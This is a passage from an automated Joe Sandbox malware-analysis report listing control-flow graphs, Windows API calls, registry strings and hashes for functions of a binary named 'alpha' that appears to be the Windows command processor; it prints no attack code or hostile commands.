7ff706ecf141-7ff706ecf14b 444->451 452 7ff706ec543c-7ff706ec545e GetLocaleInfoW 444->452 453 7ff706ecf10b-7ff706ecf115 445->453 446->435 446->440 447->448 454 7ff706ecf09a-7ff706ecf0a5 447->454 448->438 449->450 455 7ff706ecf0dd-7ff706ecf0e8 449->455 450->445 460 7ff706ecf14e-7ff706ecf158 451->460 456 7ff706ecf184-7ff706ecf18b 452->456 457 7ff706ec5464-7ff706ec5486 GetLocaleInfoW 452->457 458 7ff706ecf12d-7ff706ecf138 453->458 459 7ff706ecf117-7ff706ecf11e 453->459 454->442 454->448 455->443 455->450 463 7ff706ecf18e-7ff706ecf198 456->463 464 7ff706ecf1c4-7ff706ecf1ce 457->464 465 7ff706ec548c-7ff706ec54ae GetLocaleInfoW 457->465 458->451 459->458 466 7ff706ecf120-7ff706ecf12b 459->466 461 7ff706ecf170-7ff706ecf17b 460->461 462 7ff706ecf15a-7ff706ecf161 460->462 461->456 462->461 467 7ff706ecf163-7ff706ecf16e 462->467 468 7ff706ecf1b0-7ff706ecf1bb 463->468 469 7ff706ecf19a-7ff706ecf1a1 463->469 472 7ff706ecf1d1-7ff706ecf1db 464->472 470 7ff706ec54b4-7ff706ec54f5 setlocale call 7ff706ec8f80 465->470 471 7ff706ecf207-7ff706ecf20e 465->471 466->453 466->458 467->460 467->461 468->464 469->468 474 7ff706ecf1a3-7ff706ecf1ae 469->474 473 7ff706ecf211-7ff706ecf21b 471->473 476 7ff706ecf1f3-7ff706ecf1fe 472->476 477 7ff706ecf1dd-7ff706ecf1e4 472->477 478 7ff706ecf233-7ff706ecf23e 473->478 479 7ff706ecf21d-7ff706ecf224 473->479 474->463 474->468 476->471 477->476 481 7ff706ecf1e6-7ff706ecf1f1 477->481 479->478 482 7ff706ecf226-7ff706ecf231 479->482 481->472 481->476 482->473 482->478
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9c6bd17f64cb01cca8f19400a1c02abcea2e238f350f19ca3a987e6d4c4d2587
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F15B69B0874286EF25AF15ED202BBB6A5BF44B94FD44136CA0D47794EF3CE51AC320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 483 7ff706ec4224-7ff706ec42a5 InitializeProcThreadAttributeList 484 7ff706ececd4-7ff706ececee GetLastError call 7ff706ed9eec 483->484 485 7ff706ec42ab-7ff706ec42e5 UpdateProcThreadAttribute 483->485 492 7ff706eced1e 484->492 487 7ff706ececf0-7ff706eced19 GetLastError call 7ff706ed9eec DeleteProcThreadAttributeList 485->487 488 7ff706ec42eb-7ff706ec43c6 memset * 2 GetStartupInfoW call 7ff706ec3a90 call 7ff706ebb900 485->488 487->492 497 7ff706ec4638-7ff706ec4644 _local_unwind 488->497 498 7ff706ec43cc-7ff706ec43d3 488->498 499 7ff706ec4649-7ff706ec4650 497->499 498->499 500 7ff706ec43d9-7ff706ec43dc 498->500 499->500 503 7ff706ec4656-7ff706ec465d 499->503 501 7ff706ec4415-7ff706ec4424 call 7ff706ec5a68 500->501 502 7ff706ec43de-7ff706ec43f5 wcsrchr 500->502 510 7ff706ec442a-7ff706ec4486 CreateProcessW 501->510 511 7ff706ec4589-7ff706ec4590 501->511 502->501 504 7ff706ec43f7-7ff706ec440f lstrcmpW 502->504 503->501 506 7ff706ec4663 503->506 504->501 507 7ff706ec4668-7ff706ec466d call 7ff706ed9044 504->507 506->500 507->501 513 7ff706ec448b-7ff706ec448f 510->513 511->510 514 7ff706ec4596-7ff706ec45fa CreateProcessAsUserW 511->514 515 7ff706ec4672-7ff706ec4682 GetLastError 513->515 516 7ff706ec4495-7ff706ec44c7 CloseHandle call 7ff706ec498c 513->516 514->513 518 7ff706ec468d-7ff706ec4694 515->518 516->518 522 7ff706ec44cd-7ff706ec44e5 516->522 520 7ff706ec46a2-7ff706ec46ac 518->520 521 7ff706ec4696-7ff706ec46a0 518->521 523 7ff706ec46ae-7ff706ec46b5 call 7ff706ec97bc 520->523 526 7ff706ec4705-7ff706ec4707 520->526 521->520 521->523 524 7ff706ec47a3-7ff706ec47a9 522->524 525 7ff706ec44eb-7ff706ec44f2 522->525 541 7ff706ec4703 523->541 542 7ff706ec46b7-7ff706ec4701 call 7ff706f0c038 523->542 528 7ff706ec45ff-7ff706ec4607 525->528 529 7ff706ec44f8-7ff706ec4507 525->529 526->522 527 7ff706ec470d-7ff706ec472a call 7ff706ebcd90 526->527 546 7ff706ec473d-7ff706ec4767 call 7ff706ec13e0 call 7ff706ed9eec call 7ff706ebff70 _local_unwind 527->546 547 7ff706ec472c-7ff706ec4738 _local_unwind 527->547 528->529 532 7ff706ec460d 528->532 533 7ff706ec4612-7ff706ec4616 529->533 534 7ff706ec450d-7ff706ec4553 call 7ff706ec5cb4 call 7ff706ec33f0 call 7ff706ec498c 529->534 537 7ff706ec476c-7ff706ec4773 532->537 539 7ff706ec47d7-7ff706ec47df 533->539 540 7ff706ec461c-7ff706ec4633 533->540 564 7ff706ec4558-7ff706ec455e 534->564 537->529 543 7ff706ec4779-7ff706ec4780 537->543 544 7ff706ec47f2-7ff706ec483c call 7ff706ebff70 DeleteProcThreadAttributeList call 7ff706ec8f80 539->544 548 7ff706ec47e1-7ff706ec47ed CloseHandle 539->548 540->544 541->526 542->526 543->529 551 7ff706ec4786-7ff706ec4789 543->551 546->537 547->546 548->544 551->529 556 7ff706ec478f-7ff706ec4792 551->556 556->524 561 7ff706ec4794-7ff706ec479d call 7ff706eda250 556->561 561->524 561->529 567 7ff706ec4564-7ff706ec4579 call 7ff706ec498c 564->567 568 7ff706ec47ae-7ff706ec47ca call 7ff706ec33f0 564->568 567->544 576 7ff706ec457f-7ff706ec4584 call 7ff706eda920 567->576 568->539 576->544
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 388421343-2905461000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5cbed98a74921cf9e0d604249510f28a7cbe56b949df4b03d634635dbaf72208
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F12A32A18B82C6EA60AB11AC647BBF7E4FF85790F954135DA4D43694DF3CE446CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 579 7ff706ec5554-7ff706ec55b9 call 7ff706eca640 582 7ff706ec55bc-7ff706ec55e8 RegOpenKeyExW 579->582 583 7ff706ec5887-7ff706ec588e 582->583 584 7ff706ec55ee-7ff706ec5631 RegQueryValueExW 582->584 583->582 587 7ff706ec5894-7ff706ec58db time srand call 7ff706ec8f80 583->587 585 7ff706ec5637-7ff706ec5675 RegQueryValueExW 584->585 586 7ff706ecf248-7ff706ecf24d 584->586 588 7ff706ec5677-7ff706ec567c 585->588 589 7ff706ec568e-7ff706ec56cc RegQueryValueExW 585->589 591 7ff706ecf24f-7ff706ecf25b 586->591 592 7ff706ecf260-7ff706ecf265 586->592 593 7ff706ec5682-7ff706ec5687 588->593 594 7ff706ecf28b-7ff706ecf290 588->594 595 7ff706ec56d2-7ff706ec5710 RegQueryValueExW 589->595 596 7ff706ecf2b6-7ff706ecf2bb 589->596 591->585 592->585 598 7ff706ecf26b-7ff706ecf286 _wtol 592->598 593->589 594->589 603 7ff706ecf296-7ff706ecf2b1 _wtol 594->603 601 7ff706ec5712-7ff706ec5717 595->601 602 7ff706ec5729-7ff706ec5767 RegQueryValueExW 595->602 599 7ff706ecf2bd-7ff706ecf2c9 596->599 600 7ff706ecf2ce-7ff706ecf2d3 596->600 598->585 599->595 600->595 604 7ff706ecf2d9-7ff706ecf2f4 _wtol 600->604 605 7ff706ec571d-7ff706ec5722 601->605 606 7ff706ecf2f9-7ff706ecf2fe 601->606 607 7ff706ec579f-7ff706ec57dd RegQueryValueExW 602->607 608 7ff706ec5769-7ff706ec576e 602->608 603->589 604->595 605->602 606->602 609 7ff706ecf304-7ff706ecf31a wcstol 606->609 612 7ff706ec57e3-7ff706ec57e8 607->612 613 7ff706ecf3a9 607->613 610 7ff706ecf320-7ff706ecf325 608->610 611 7ff706ec5774-7ff706ec578f 608->611 609->610 614 7ff706ecf34b 610->614 615 7ff706ecf327-7ff706ecf33f wcstol 610->615 616 7ff706ec5795-7ff706ec5799 611->616 617 7ff706ecf357-7ff706ecf35e 611->617 618 7ff706ecf363-7ff706ecf368 612->618 619 7ff706ec57ee-7ff706ec5809 612->619 622 7ff706ecf3b5-7ff706ecf3b8 613->622 614->617 615->614 616->607 616->617 617->607 623 7ff706ecf38e 618->623 624 7ff706ecf36a-7ff706ecf382 wcstol 618->624 620 7ff706ec580f-7ff706ec5813 619->620 621 7ff706ecf39a-7ff706ecf39d 619->621 620->621 625 7ff706ec5819-7ff706ec5823 620->625 621->613 626 7ff706ecf3be-7ff706ecf3c5 622->626 627 7ff706ec582c 622->627 623->621 624->623 625->622 628 7ff706ec5829 625->628 629 7ff706ec5832-7ff706ec5870 RegQueryValueExW 626->629 627->629 630 7ff706ecf3ca-7ff706ecf3d1 627->630 628->627 631 7ff706ec5876-7ff706ec5882 RegCloseKey 629->631 632 7ff706ecf3dd-7ff706ecf3e2 629->632 630->632 631->583 633 7ff706ecf433-7ff706ecf439 632->633 634 7ff706ecf3e4-7ff706ecf412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff706ecf43f-7ff706ecf44c call 7ff706ebb900 633->635 636 7ff706ecf414-7ff706ecf426 call 7ff706ec13e0 634->636 637 7ff706ecf428 634->637 635->631 638 7ff706ecf42e 636->638 637->638 638->633
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 145004033-3846321370
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1b29ee19206624d46299c0daef502ec5317ed01a61bf97b30fcd13520eff6847
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00E16E3692DB82C6EB50AB10EC6057BF7A0FF89754F805135EA8E02A58DF7CE545CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 821 7ff706ec37d8-7ff706ec3887 GetCurrentThreadId OpenThread call 7ff706ec04f4 HeapSetInformation RegOpenKeyExW 824 7ff706ece9f8-7ff706ecea3b RegQueryValueExW RegCloseKey 821->824 825 7ff706ec388d-7ff706ec38eb call 7ff706ec5920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff706ecea41-7ff706ecea59 GetThreadLocale 824->827 825->827 831 7ff706ec38f1-7ff706ec3913 memset 825->831 829 7ff706ecea74-7ff706ecea77 827->829 830 7ff706ecea5b-7ff706ecea67 827->830 834 7ff706ecea94-7ff706ecea96 829->834 835 7ff706ecea79-7ff706ecea7d 829->835 830->829 832 7ff706eceaa5 831->832 833 7ff706ec3919-7ff706ec3935 call 7ff706ec4d5c 831->833 836 7ff706eceaa8-7ff706eceab4 832->836 842 7ff706eceae2-7ff706eceaff call 7ff706eb3240 call 7ff706ed8530 call 7ff706ec4c1c 833->842 843 7ff706ec393b-7ff706ec3942 833->843 834->832 835->834 838 7ff706ecea7f-7ff706ecea89 835->838 836->833 839 7ff706eceaba-7ff706eceac3 836->839 838->834 841 7ff706eceacb-7ff706eceace 839->841 844 7ff706eceac5-7ff706eceac9 841->844 845 7ff706ecead0-7ff706eceadb 841->845 853 7ff706eceb00-7ff706eceb0d 842->853 847 7ff706ec3948-7ff706ec3962 _setjmp 843->847 848 7ff706eceb27-7ff706eceb40 _setjmp 843->848 844->841 845->836 851 7ff706eceadd 845->851 847->853 854 7ff706ec3968-7ff706ec396d 847->854 849 7ff706eceb46-7ff706eceb49 848->849 850 7ff706ec39fe-7ff706ec3a05 call 7ff706ec4c1c 848->850 856 7ff706eceb66-7ff706eceb6f call 7ff706ec01b8 849->856 857 7ff706eceb4b-7ff706eceb65 call 7ff706eb3240 call 7ff706ed8530 call 7ff706ec4c1c 849->857 850->824 851->833 867 7ff706eceb15-7ff706eceb1f call 7ff706ec4c1c 853->867 859 7ff706ec396f 854->859 860 7ff706ec39b9-7ff706ec39bb 854->860 882 7ff706eceb71-7ff706eceb82 _setmode 856->882 883 7ff706eceb87-7ff706eceb89 call 7ff706ec86f0 856->883 857->856 868 7ff706ec3972-7ff706ec397d 859->868 863 7ff706ec39c1-7ff706ec39c3 call 7ff706ec4c1c 860->863 864 7ff706eceb20 860->864 879 7ff706ec39c8 863->879 864->848 867->864 870 7ff706ec397f-7ff706ec3984 868->870 871 7ff706ec39c9-7ff706ec39de call 7ff706ebdf60 868->871 870->868 877 7ff706ec3986-7ff706ec39ae call 7ff706ec0580 GetConsoleOutputCP GetCPInfo call 7ff706ec04f4 870->877 871->867 891 7ff706ec39e4-7ff706ec39e8 871->891 897 7ff706ec39b3 877->897 879->871 882->883 888 7ff706eceb8e-7ff706ecebad call 7ff706ec58e4 call 7ff706ebdf60 883->888 902 7ff706ecebaf-7ff706ecebb3 888->902 891->850 895 7ff706ec39ea-7ff706ec39ef call 7ff706ebbe00 891->895 899 7ff706ec39f4-7ff706ec39fc 895->899 897->860 899->870 902->850 903 7ff706ecebb9-7ff706ecec24 call 7ff706ec58e4 GetConsoleOutputCP GetCPInfo call 7ff706ec04f4 call 7ff706ebbe00 call 7ff706ec0580 GetConsoleOutputCP GetCPInfo call 7ff706ec04f4 902->903 903->888
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2624720099-1920437939
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d1b584beefd050d1a082cbaeab9ce822e33cdb86b884a87b2a7de5c70d799383
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2e94023a2358b464c30370c3d60452e43b25d6dd8544250c40a2bdd9e65d7244
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1b584beefd050d1a082cbaeab9ce822e33cdb86b884a87b2a7de5c70d799383
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1C1B035E087428AF714BB60AC701BBFAA0FF49764FD49139D90E576A5DF3CA4468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1118 7ff706ec823c-7ff706ec829b FindFirstFileExW 1119 7ff706ec82cd-7ff706ec82df 1118->1119 1120 7ff706ec829d-7ff706ec82a9 GetLastError 1118->1120 1124 7ff706ec8365-7ff706ec837b FindNextFileW 1119->1124 1125 7ff706ec82e5-7ff706ec82ee 1119->1125 1121 7ff706ec82af 1120->1121 1122 7ff706ec82b1-7ff706ec82cb 1121->1122 1126 7ff706ec83d0-7ff706ec83e5 FindClose 1124->1126 1127 7ff706ec837d-7ff706ec8380 1124->1127 1128 7ff706ec82f1-7ff706ec82f4 1125->1128 1126->1128 1127->1119 1129 7ff706ec8386 1127->1129 1130 7ff706ec82f6-7ff706ec8300 1128->1130 1131 7ff706ec8329-7ff706ec832b 1128->1131 1129->1120 1133 7ff706ec8332-7ff706ec8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff706ec8302-7ff706ec830e 1130->1134 1131->1121 1132 7ff706ec832d 1131->1132 1132->1120 1135 7ff706ec8356-7ff706ec8363 1133->1135 1136 7ff706ec8310-7ff706ec8313 1134->1136 1137 7ff706ec838b-7ff706ec83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1140 7ff706ec8315-7ff706ec8323 1136->1140 1141 7ff706ec8327 1136->1141 1138 7ff706ed50f8-7ff706ed511e GetLastError FindClose 1137->1138 1139 7ff706ec83c8-7ff706ec83ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 873889042-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e38697bad9fd139ba353cde33be6133a8b2396395a243754ad6cd136da81dc2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86512A35A09B42C6E710AB11ED6817BFBA0FF59B91FC59531CA1D43394DF3CE4558620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
